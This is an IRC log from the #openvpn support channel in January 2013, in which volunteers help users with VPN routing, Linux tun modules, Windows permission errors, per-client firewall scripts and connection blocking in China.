17:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
17:00 < roentgen> 1150.000 I guess... I forgot
17:01 < roentgen> that's what cpuinfo says
17:01 <@krzee> dmesg
17:01 < roentgen> it's gone with iptables traffic
17:01 <@krzee> ah
17:03 <@krzee> you're only trying to reach a webserver on the vpn server, right?
17:03 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 255 seconds]
17:04 < roentgen> krzee: yes
17:04 <@krzee> then try not pushing that lan route
17:04 <@krzee> just by connecting you get a route to the server
17:04 < roentgen> I didn't push any routes at first
17:05 <@krzee> which is working we know because the server can ping the client (and gets a response)
17:05 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
17:05 <@krzee> actually now that i think of it, if that is already true you dont need to change a thing
17:05 <@krzee> if ping works, the web connection should as well
17:06 < roentgen> ping works only with redirect-gateway
17:06 <@krzee> try tcpdump on the server tun device and see whats going on with the web connection
17:06 <@krzee> oh
17:06 <@krzee> try losing that /19 route
17:06 <@krzee> then tell me if the server can ping the clients vpn ip
17:07 < roentgen> yes the server and other clients can ping the ipad
17:07 < roentgen> the ipad client can't see anything
17:07 <@krzee> ok
17:08 <@krzee> now try the web connection while running tcpdump on the server sniffing for the client
17:08 <@krzee> my ipod touch cant ping my vpn server either but all other clients can
17:08 <@krzee> dunno why, just how it is, some sort of filter in there
17:08 <@krzee> your server needs to sniff its tun device
17:09 <@krzee> while you try to make the web connection to the server's vpn ip
17:09 < roentgen> I'm no tcpdump expert but on the ipad traceroute to 10.8.0.1 goes through the local gateway
17:10 <@krzee> ipad is not your server
17:11 < roentgen> 10.8/19 on the ipad looks right to you?
17:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
17:18 -!- Devastator [~devas@186.214.14.9] has joined #openvpn
17:19 -!- Devastator [~devas@186.214.14.9] has quit [Changing host]
17:19 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
17:21 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 248 seconds]
17:27 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 276 seconds]
17:28 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
17:38 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn
17:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
17:43 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 255 seconds]
17:46 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Read error: Connection reset by peer]
18:38 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 252 seconds]
18:43 -!- brute11k [~brute11k@89.249.230.233] has joined #openvpn
18:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
18:49 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn
18:49 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn []
18:50 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn
18:51 -!- mintuser [~mintuser@cpe-74-73-157-238.nyc.res.rr.com] has joined #openvpn
18:52 < zrzerenato> flushipnettable failed on interface using non-admin windows 7 account, i tried already (www.openvpn.se) and some google but still not solved, anyone?
18:52 < mintuser> I am going crazy trying to get an openvpn client running using linuxmint. the latest error is Options error: You must define TUN/TAP device (--dev) but I have tried --dev tun on the command line and dev tun in the config file.
18:53 < mintuser> can anyone help me?
18:54 < mintuser> zrzerenato: is anyone around to help?
18:55 <@krzee> roentgen, no, but i haven't tried a /19 before
18:56 < mintuser> krzee: are you someone who could help?
18:56 <@krzee> but on a /8 /16 or /24 it simply leaves off the empty octets, so maybe its right
18:56 <@krzee> must be
19:00 < mintuser> I guess there is nobody to help.
19:00 <@krzee> roentgen, on the server
19:00 <@krzee> tcpdump -s0 -i tun0 port 80
19:00 <@krzee> then try to access from the client
19:00 <@krzee> !download
19:00 <@krzee> dont use openvpn.se thats WAY old
19:00 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
19:00 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
19:01 <@krzee> mintuser, the last part was for you
19:01 < mintuser> hmm vpnHelper sounds like somebody who would be able to help. Are you willing to try to help me vpnHelper ?
19:01 < mintuser> oh?
19:01 <@krzee> !bot
19:01 <@vpnHelper> "bot" is I'm a bot.. just a bot. krzee and ecrist are my maintainers, and I haven't said anything, if you'd notice, the person who spoke just before me gave a !command to make me speak :P
19:01 < mintuser> which part
19:02 < mintuser> I don't see anything that looks directed at me or my problem.
19:02 <@krzee> [16:59] !download
19:02 <@krzee> [16:59] dont use openvpn.se thats WAY old
19:02 <@krzee> [16:59] !download
19:02 <@krzee> [16:59] dont use openvpn.se thats WAY old
19:02 < mintuser> what is openvpn.se?
19:03 <@krzee> oops doublepaste
19:03 <@krzee> oops that was zrzerenato
19:03 <@krzee> do you have the tun kernel module loaded?
19:03 < mintuser> used apt-get install from linuxmint 14, Nadia
19:03 < mintuser> yes.
19:03 <@krzee> that doesnt load the tun module into your kernel tho
19:04 <@krzee> try lsmod|grep tun
19:04 < mintuser> Wed Jan 23 18:56:02 2013 TUN/TAP device tun0 opened
19:04 < mintuser> Wed Jan 23 18:56:02 2013 TUN/TAP TX queue length set to 100
19:04 < mintuser> Wed Jan 23 18:56:02 2013 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
19:04 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 248 seconds]
19:04 < mintuser> from output
19:05 < mintuser> oh
19:05 <@krzee> ahh ok
19:05 <@krzee> !logs
19:05 <@krzee> !configs
19:05 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
19:05 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
19:05 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Read error: Operation timed out]
19:06 < mintuser> not my client so I can't paste those
19:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
19:07 < mintuser> which logs,
19:07 < mintuser> I chucked my config file and have been using cli parameters
19:08 < mintuser> so I could change things faster
19:08 < mintuser> I have tried so many different things I don't know which to show
19:09 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
19:09 < mintuser> hmm nothing loaded into the kernel. hmmm
19:11 < mintuser> do I add mktun
19:12 < mintuser> no tun.ko, should I have one?
19:13 < mintuser> oh dear I am in over my head here
19:14 < zrzerenato> krzee didn't get what u said ?
19:15 < zrzerenato> my vpn server is already installed and working perfectly. centos 6 with openvpn
19:15 <@krzee> right
19:16 <@krzee> dont use openvpn.se
19:16 <@krzee> !download
19:16 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
19:16 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
19:16 <@krzee> mintuser, you need to recompile your kernel with tun support, that is outside of openvpn
19:16 < mintuser> what is directed at me and what is for zrzerenato etc
19:16 < mintuser> oh no. I can't believe the mintlinux kernel doesn't have tun support
19:16 < mintuser> linuxmint
19:17 <@krzee> i bet you need to compile it in
19:17 < mintuser> but everyone in #linuxmint says it is usable for openvpn with the default install.
19:17 < zrzerenato> all clients are working good with the administrator account, but the employees use a (User Account) without admin privileges on Win7,
19:18 < zrzerenato> and they cannot connect.
19:18 <@krzee> [17:06] not my client so I can't paste those
19:18 <@krzee> that means i cant help you
19:18 <@krzee> zrzerenato, that is correct, it requires admin
19:18 <@krzee> !win_noadmin
19:18 <@vpnHelper> "win_noadmin" is (#1) http://openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin-Rev1.1.html for HowTo Run OpenVPN as a non-admin user in Windows or (#2) and http://article.gmane.org/gmane.network.openvpn.user/24873 for vista
19:18 <@krzee> you can try to figure out the win7 way
19:18 <@krzee> if you find it, ill add it to the bot
19:19 <@krzee> or you can set it to run automatically on those computers as a windows service
19:19 < zrzerenato> i tried that already, but still with the same error msg. (flushipnettable failed on interface)
19:19 <@krzee> openvpn needs access to add routes and modify the network
19:19 <@krzee> without that access you'll have the problems you're having
19:20 < zrzerenato> yeap. agreed
19:20 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
19:20 < zrzerenato> and i set on the admin account privileges for (Users Account) to run Openvpn as Administrator
19:21 < zrzerenato> and it executes and connects, but i cannot ping, or access the network tunnel
19:22 <@krzee> did you install from http://openvpn.net/index.php/download/community-downloads.html ?
19:22 <@vpnHelper> Title: Community Downloads (at openvpn.net)
19:23 -!- AsadH is now known as zz_AsadH
19:23 < zrzerenato> krzee yes
19:24 < zrzerenato> krzee 2.3.0 and 2.2.2 versions
19:26 <@krzee> ok
19:26 <@krzee> on the desktop
19:26 <@krzee> right click and go to properties
19:26 <@krzee> then compatibility mode
19:26 <@krzee> then run as admin
19:27 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Read error: Operation timed out]
19:30 < mintuser> oh sorry, I mean not my server.
19:30 < mintuser> of course it is my client
19:30 < zrzerenato> it runs as both users (Admin) and (non-Admin). on (Admin) i can access the tunnel and ping my server, use remote apps, but with (non-Admin) it gives (flushipnettable failed on interface) ACCESS DENIED, but still looks like connected, but it is not routing correctly
19:30 < mintuser> and I can paste most information from the server as well, just not the config file itself.
19:31 <@krzee> well for your problem i guess just client side is fine
19:31 <@krzee> zrzerenato, sounds right
19:31 <@krzee> i gave you some options
19:31 <@krzee> compatibility mode - run as admin, or run it as a windows service in the background
19:32 <@krzee> and there should be another way the "windows way" but i dont know it
19:32 <@krzee> we only have it in the bot for xp and vista
19:32 -!- brute11k1 [~brute11k@89.249.230.232] has joined #openvpn
19:32 < zrzerenato> krzee sure u have mate .. appreciate it, when i fix it i'll post it
19:33 < zrzerenato> krzee cheers !
19:33 <@krzee> cheers!
19:33 <@krzee> im using ospf to route to an ip over 2 ptp links (when 1 goes down it uses the other link), but now i need layer2 over the vpn. any ideas how i can make this work with failover?
19:35 -!- brute11k [~brute11k@89.249.230.233] has quit [Ping timeout: 276 seconds]
19:36 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
19:37 < zrzerenato> krzee sorry maybe next time. not very familiar
19:37 < zrzerenato> ;)
19:37 <@krzee> =]
19:38 < zrzerenato> see you soon
19:38 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has left #openvpn []
19:41 <@krzee> pekster, rob0 maybe any ideas?
19:42 <@krzee> or ecrist?
19:42 <@krzee> for some reason i feel like 2 bridges would create a whole lot of fubar
19:44 <@krzee> and the 2 machines that need to communicate over the failover link are windows machines so i cant use ptp tap on them and then run the ospf there
19:47 -!- raidz is now known as raidz_away
19:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
20:06 < mintuser> krzee is the only way to use tun devices to compile support into the kernel or should something like insmod work if I could find a tun.ko which I haven't been able to do so far.
20:08 <@krzee> you can compile it as a module, the same way as compiling it in
20:11 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 245 seconds]
20:13 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
20:13 < mintuser> now if I could just find a tun.ko for linux mint
20:14 <@krzee> lol
20:14 <@krzee> you're doing it wrong
20:14 < mintuser> that is what I thought but someone here said to compile it.
20:14 <@krzee> [17:17] but everyone in #linuxmint says it is usable for openvpn with the default install.
20:14 <@krzee> \
20:14 <@krzee> that would mean it has it
20:15 < mintuser> if you search on their forums for tun.ko vpn etc. it comes back saying "tun ko vpn being skipped search words must be at least 5 characters long"
20:15 < mintuser> krzee: yes, that is what is so odd.
20:15 <@krzee> im done talking in circles, post the logs and configs like i said to an hour ago :-p
20:15 < mintuser> I have a vanilla default install of the latest Nadia (14) with kde.
20:16 < mintuser> and if I had seen an option wrt tun devices I definitely would have selected to include it.
20:16 < mintuser> which pastebin is preferred here?
20:16 <@krzee> whatev
20:16 < mintuser> sorry krzee I was off looking for a tun.ko
20:17 < mintuser> not even google helped, much less more standard routes.
20:17 <@krzee> cause thats not how it goes
20:19 < mintuser> was that for me krzee. I will be back again but right now the heat has gone out in my building and it is way way below freezing
20:19 <@krzee> [18:15] im done talking in circles, post the logs and configs like i said to an hour ago :-p
20:19 <@krzee> bye
20:19 < mintuser> I'm in the northeast us
20:19 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn
20:20 < mintuser> 13 degrees and getting colder
20:20 < mintuser> my fingers can't type easily anymore
20:28 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has quit [Remote host closed the connection]
20:54 -!- guest061 [~yaaic@cpe-74-73-157-238.nyc.res.rr.com] has joined #openvpn
21:20 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn
21:21 < troker> Hey all, anyone know of a way to set up routing based off client in OpenVPN? AKA UserA can talk to 10.0.10.0/24 and UserB can talk to 10.0.10.2/32
21:24 <+pekster> krzee: tap-based failover? To the same peer, like device bonding? Or you mean different peers
21:25 <+pekster> troker: Routing, or do you mean firewalling? I suspect you don't really want different routing views for multiple VPN clients from the same VPN network
21:28 < troker> pekster: I guess, but the firewall can't figure out what ip goes to what client? Can I make that a static setting? UserB gets ip x.x.x.x and CAN NOT change it?
21:29 <+pekster> troker: Are we talking about issuing IPs to clients, or filtering where a connected client can forward traffic? What's your overall goal?
21:30 < troker> pekster: overall goal is UserA can talk to 10.0.10.0/24 and UserB can talk to 10.0.10.2/32 (single host)
21:31 -!- xbskid [~asdf@cpe-67-244-148-156.rochester.res.rr.com] has joined #openvpn
21:31 < xbskid> So I fixed my issue from yesterday.
21:31 < troker> So per-client routing (OpenVPN routes from "fake" VPN network to real 'far-side' network)
21:31 < troker> routing/firewalling <- my confusion lies here
21:32 <+pekster> troker: No. You don't want "per client routing rule" on your server. You stop traffic from going where you don't want it to with a firewall
21:32 <+pekster> You may of course opt not to push the route to a specific client, but anyone with admin access on the client can simply add a route back in
21:32 < troker> pekster: ok, that makes a lot of sense - any thoughts on implementing per-client firewalling?
21:33 <+pekster> You can do per-client firewalling by using a --client-connect script that has access to the variables for the client. Specifically, the $common_name env-var lets you see who is connecting, and take action based on the user
21:33 <+pekster> troker: See the manpage section titled 'SCRIPTING AND ENVIRONMENTAL VARIABLES' to get an idea of all the variables available to you. You're going to be interested in the $remote_ip and $common_name, most likely
21:34 <+pekster> Cook up a way to do any on-demand firewall rules when the client connects, and remove them when the client disconnects
21:36 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Remote host closed the connection]
21:37 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has quit [Ping timeout: 240 seconds]
21:39 < troker> pekster: Thanks so much! I will look into it!
21:40 <+pekster> Someday when I'm motivated I'll write a handy openvpn/netfilter per-client integration script suite. But not tonight
21:40 <+pekster> I did one for a prior employer, but sadly that's not copyleft and is locked up in their SVN repos :(
21:41 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn
21:45 -!- mintuser [~mintuser@cpe-74-73-157-238.nyc.res.rr.com] has quit [Quit: Leaving]
22:11 -!- guest061 [~yaaic@cpe-74-73-157-238.nyc.res.rr.com] has quit [Ping timeout: 248 seconds]
22:14 -!- Saviq [~Saviq@canonical/saviq] has quit [Ping timeout: 248 seconds]
22:17 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn
22:23 <@krzee> pekster, i have 2 isps, so i make 2 links to the same server (1 on each isp)
22:24 <@krzee> well in reality each side has 2 isps, there are 2 separate servers running on the same iron (1 listening on each isp)
22:24 <+pekster> Recent kernels added some really interesting looking new feature, basically NIC-teaming for arbitrary links like that
22:25 <+pekster> I don't know if you wanted strictly failover, or a teaming solution. I just noticed it long enough to press 'n' when make oldconfig wanted to know what it was
22:25 <@krzee> strictly failover, no traffic over link b until link a is down
22:29 <+pekster> If you can determine the link-down event (ie: if it's clean and something a distro's if-down script would catch) you could adjust ip routes or rules to send over the 2nd tunnel
22:29 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Ping timeout: 248 seconds]
22:30 <@krzee> active directory requires layer2, right?
22:30 <+pekster> Nope. Maybe if you're trying to use broadcast NBNS, but I'd call that doing it wrong
22:30 <@krzee> as would i
22:30 <@krzee> i thought it needed layer2, thats great
22:30 <+pekster> With a proper-functioning DNS setup Windows AD works just fine over L3
22:31 <@krzee> theres no internal dns setup outside of what AD does by itself to work
22:31 <+pekster> (proper being 'send all DNS with anything related to the AD domain to the authoritative DC's DNS servers')
22:31 <@krzee> ahh ok, that can be done
22:31 <@krzee> dnsmasq would be easy enough for that
22:32 <+pekster> Yea. I used a split-horizon DNS and split-routing when I supported perma-remote employees with embedded hardware last job
22:32 <+pekster> Really slick solution
22:32 <+pekster> You could even join/remove PCs from the domain from their desk thousands of miles from the office/colo with the DC's
22:33 <+pekster> The VoIP had to have some hand-holding to get the tftp boot stuff working, but even that wasn't too bad with dnsmasq
22:33 <@krzee> well im damned glad to find that i dont need layer2
22:33 <+pekster> The solution is "ship it, plug it in, a little fine-tuning the QoS master control knobs, and the employee is set"
22:34 <+pekster> That crap lived for months too without a reboot. The family dog or a move was more likely to interrupt service ;)
22:34 <@krzee> that means all i need to do is configure dnsmasq (sounds like a very simple config) and join it to the domain
22:34 <+pekster> Yea
22:34 <@krzee> hah and i already have dnsmasq running there!
22:35 <+pekster> AD does everything over L3 fine. It's the concept of "Active" or even being a "Directory" I'll take issue with. Just because you can connect to it via jxplorer does not mean it's actually LDAP :P
22:36 <@krzee> orly? i thought it was basically just a complex ldap schema
22:36 <@krzee> in fact someone told me they hacked up an ldap to interact with AD
22:37 <+pekster> Sorta, kinda. With undocumented land mines thrown in there too because someone's monkey got access to visual studio that week
22:37 <@krzee> hahha
22:37 <+pekster> http://xkcd.com/323/
22:37 <@vpnHelper> Title: xkcd: Ballmer Peak (at xkcd.com)
22:38 <@krzee> nice
22:38 <+pekster> AD:LDAP::Citrix:VPN
22:38 -!- brute11k1 [~brute11k@89.249.230.232] has quit [Quit: Leaving.]
22:39 <+pekster> Don't you know Citrix has a nice big "Connect" button? Why don't we do that? :)
22:45 < ngharo> print drivers. ohhh the humanity
22:47 <+pekster> I was highly-impressed with whatever fancy MFD Ricoh printer/copy/fax/pure-awesome device the last company with money I worked at had. They actually produced driver sources that built cleanly on a modern Linux system and the ppd "just worked" in CUPS. I was floored that a company could actually get that right :P
22:48 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Read error: Connection reset by peer]
22:48 < ngharo> wow
22:48 < ngharo> thats like unheard of
22:48 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn
22:48 < ngharo> granted all my citrix knowledge is from 7 years ago
22:48 <+pekster> I was indeed skeptical when the INSTALL docs basically read "extract, run make, and install the ppd file into your CUPS browser" but then it actually worked
22:48 <+pekster> Oh, printers and Citrix? Yea, they've grown up a bit with "universal" print drivers
22:49 <+pekster> Of course, if you can't get those, you're screwed :P
22:49 < ngharo> HP had some back then, i started enforcing a policy if it dont work with UPD, not supporting
22:49 <+pekster> Yup. We've got enough printing standards. Now we need OS/printer combinations that actually work with them :P
22:50 < ngharo> the citrix UPD sucked, spooled up 2GB jobs for a two page doc
22:50 <+pekster> http://xkcd.com/927/
22:50 <@vpnHelper> Title: xkcd: Standards (at xkcd.com)
22:50 -!- troker_ [~troker@174.142.10.177] has joined #openvpn
22:51 -!- troker_ [~troker@174.142.10.177] has quit [Client Quit]
22:51 < ngharo> pekster: did you post that message to the dev list re: nsis script?
22:51 <+pekster> Yup
22:52 < ngharo> nice writeup :)
22:52 <+pekster> I meant to do that a few days back when I finally tracked the source lines against my PE output
22:52 <+pekster> I just got lost in some other project
22:52 < ngharo> i saw a commit that touched on it, any progress on it?
22:52 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Ping timeout: 245 seconds]
22:52 < ngharo> didn't see any replies to your post :/
22:52 <+pekster> I'm not sure it's the commit that's the problem
22:53 <+pekster> Near as I can tell the person to build the installer that got released didn't use the latest sources, at least of the openvpn-build project
22:53 <+pekster> And that source file was 6mo old when I wrote that email
22:53 < ngharo> i think they should get rid of github or update it
22:53 <+pekster> Maybe there's some tagging or voting system; I'm not really up on how changes get voted on for inclusion to release targets
22:53 < ngharo> it's a source of confusion
22:54 <+pekster> That's the only place I found the nsis stuff; it's not in any of the source tgz or zips on the official site
22:54 <+pekster> It's not hard to believe the nsis crap hasn't been touched for a while
22:56 < ngharo> i suppose
22:59 <@krzee> grr
22:59 <@krzee> remote desktop over remote desktop over vpn over vpn
22:59 <@krzee> with 2 shitty connections in the mix
22:59 <@krzee> just need to get 1 route command entered, lol
23:00 <+pekster> How fast can you install sshd.exe on those RDP hosts?
;) 23:00 <+pekster> When I learned that cygwin had functional sshd support, I was quite happy ;) 23:00 <@krzee> more time than adding the route 23:02 <+pekster> If you're using rdesktop, the '-x modem' arg tends to do wonders 23:02 <+pekster> There's a bitrate flag too. -a I think? -a 15 is a nice compromize between usability and throughput 23:02 <@krzee> booya finally got a cmd 23:39 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Quit: Herpa la Derpa] 23:56 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn --- Day changed Thu Jan 24 2013 00:01 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 00:07 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!] 00:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 01:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 01:28 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:28 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:28 -!- mode/#openvpn [+o krzee] by ChanServ 01:30 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 
01:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Client Quit]
01:34 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds]
01:44 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
01:46 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
01:53 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
01:59 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds]
02:02 -!- ade_b [~Ade@109.58.197.188.bredband.tre.se] has joined #openvpn
02:02 -!- ade_b [~Ade@109.58.197.188.bredband.tre.se] has quit [Changing host]
02:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
02:26 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
02:26 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
02:52 -!- bisko [~bisko@77.70.26.115] has joined #openvpn
03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:21 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
03:25 -!- Orbi [~opera@anon-185-65.vpn.ipredator.se] has joined #openvpn
03:30 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:56 -!- zz_AsadH is now known as AsadH
03:59 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has joined #openvpn
04:03 -!- brute11k [~brute11k@89.249.230.232] has joined #openvpn
04:16 -!- dazo_afk is now known as dazo
04:53 -!- master_of_master [~master_of@p57B5402B.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
04:54 -!- master_of_master [~master_of@p57B53A40.dip.t-dialin.net] has joined #openvpn
04:59 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn
05:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
05:15 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- IRC with a difference]
06:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out]
06:17 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:29 < AsadH> novaflash: http://i.imgur.com/nrg3nuy.gif
06:29 < AsadH> oops, wrong channel
06:29 <@novaflash> that poor cat
06:30 <@novaflash> but i do like wet pussy though
06:31 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn
06:32 < draggawagga> Hey, not a native english speaker here, i have a question. Is there a good method to find out whether my isp or the gfw (sitting in china) is blocking my university openvpn network?
06:33 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Quit: Leaving]
06:34 <@novaflash> china is blocking openvpn connections yes. the best way to find out would be to try it and fail :-P
06:34 <@novaflash> but anyways, you should see RST responses when trying to connect
06:34 <@novaflash> and if you change port, and it works for a little while, and then gets blocked - that's the GFW at work
06:36 < rob0> RST is TCP-only. If you're using UDP as you should, use a nonstandard port, and vary it when (or before!) it gets detected.
06:37 <@novaflash> or, stage a coup and take over the chinese government, and remove the firewall
06:39 < draggawagga> I can't connect to the network, same with the openvpn website :p. Have to find out whether it may be my university network here in china or the provider+(or gfw). Coup is too difficult, insufficient language skills :p, rest is no problem.
06:41 <@novaflash> yeah that's more complicated. try setting up a TCP connection, and if it is blocked, run wireshark on it to see where it is being blocked and try to find out if that's in the network of your university, or beyond
06:41 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 246 seconds]
06:42 < draggawagga> Thanks, will try that out.
06:45 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 248 seconds]
06:48 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn
06:49 -!- draggawagga [~oukai@183.62.57.74] has quit [Quit: Verlassend]
06:57 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn
06:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
07:03 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso]
07:04 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has joined #openvpn
07:04 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
07:05 -!- valparaiso [~valparais@ARennes-257-1-71-13.w81-53.abo.wanadoo.fr] has quit [Client Quit]
07:09 < draggawagga> Okay, over TCP to my university-vpn to europe, in wireshark i only get information about the VPN-server and my chinese university network. that should mean it is my chinese university right?
07:13 -!- Orbi [~opera@anon-185-65.vpn.ipredator.se] has quit [Quit: Orbi]
07:25 -!- draggawagga [~oukai@183.62.57.74] has quit [Quit: Verlassend]
07:29 -!- brute11k [~brute11k@89.249.230.232] has quit [Ping timeout: 245 seconds]
07:30 -!- draggawagga [~oukai@183.62.57.74] has joined #openvpn
07:40 -!- draggawagga [~oukai@183.62.57.74] has quit [Remote host closed the connection]
07:42 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
08:19 -!- APTX_ is now known as APTX
08:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
08:39 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
08:39 <@dazo> novaflash: you can also point users at obfsproxy from the TOR project ... using obfsproxy in socks mode, and add --socks-proxy to the openvpn config ... but you need obfsproxy on the server side as well
08:40 <@novaflash> dazo; yah but he only asked how to figure out where the block is, lol. thanks ;
08:40 <@novaflash> ;)
08:40 <@dazo> if in china, presume the gov block it :)
08:41 <@novaflash> certainly
